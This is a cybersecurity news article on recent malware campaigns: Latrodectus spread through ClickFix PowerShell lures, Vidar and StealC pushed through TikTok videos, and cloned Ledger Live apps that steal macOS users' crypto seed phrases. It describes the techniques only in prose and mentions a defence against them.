Exploitation of TikTok for Malware Distribution: The Utilization of Vidar and StealC via ClickFix Methodology

The malware known as Latrodectus has recently adopted the ClickFix social engineering technique as a distribution method. The ClickFix approach poses significant risks as it enables malware execution directly in memory, bypassing conventional disk-based detection mechanisms employed by browsers and security tools.

Latrodectus is suspected to be a successor to the IcedID malware and functions primarily as a downloader for additional malicious payloads, including ransomware. First documented in April 2024 by Proofpoint and Team Cymru, Latrodectus has since emerged as a notable threat.

This malware is one of several malicious software types that experienced operational disruptions during Operation Endgame, a coordinated effort that dismantled 300 servers and neutralized 650 domains linked to various threats, including Bumblebee and QakBot, during a window from May 19 to May 22, 2025.

In the latest observed attacks involving Latrodectus, users are manipulated into copying and executing PowerShell commands sourced from compromised websites. This technique is a common method used for widespread malware distribution. When executed, these commands exploit MSIExec to install a file from a remote URL and run it in memory, reducing the risk of detection by security solutions.

The installer packages a legitimate application from NVIDIA designed to sideload a malicious DLL, which in turn employs curl to download the primary payload.

To counter these types of threats, security professionals recommend disabling the Windows Run program through Group Policy Objects (GPOs) or modifying the Windows Registry to disable the “Windows + R” shortcut.

Evolving Techniques in Cyber Threats

Alongside the activities of Latrodectus, cybersecurity firm Trend Micro disclosed a new campaign that, instead of engaging users with fake CAPTCHA pages, relies on TikTok videos, likely generated by artificial intelligence (AI). These videos promote the delivery of Vidar and StealC information stealers, enticing users to execute harmful commands under the pretext of activating Windows, Microsoft Office, CapCut, or Spotify.

These TikTok campaigns have utilized various accounts that have since been deactivated. A notable video, purporting to improve the Spotify experience, reportedly garnered around 500,000 views and significant engagement. This development illustrates the innovative methods attackers employ, manipulating social media trends to disseminate malware.

Cybercriminals are leveraging platforms like TikTok to socially engineer users into executing PowerShell commands. This tactic exemplifies the increasingly sophisticated approaches used to exploit popular platforms for malicious intent.

Compromising Mac Users’ Security

Significant findings also surfaced regarding four distinct malware campaigns utilizing cloned versions of the Ledger Live app to capture sensitive data, such as seed phrases, aiming to drain victims’ cryptocurrency wallets. This malicious activity has persisted since August 2024.

The attacks deploy malicious DMG files that activate AppleScript to gather passwords and Apple Notes data before downloading a compromised version of Ledger Live. When users open this app, they receive false alerts regarding account issues, prompting them to input their recovery seed phrases, which are subsequently sent to an attacker-controlled server.

Moonlock Lab highlighted that these rogue applications utilize macOS stealer malware, such as Atomic macOS Stealer and Odyssey, the latter of which introduced a novel phishing strategy in March 2025. This activity aligns with an ongoing campaign that targets Ledger Live users using PyInstaller-packed binaries.

The increasing discussions surrounding anti-Ledger schemes on dark web forums indicate that cybercriminals are continuously developing new strategies to exploit the trust that crypto owners place in platforms like Ledger Live.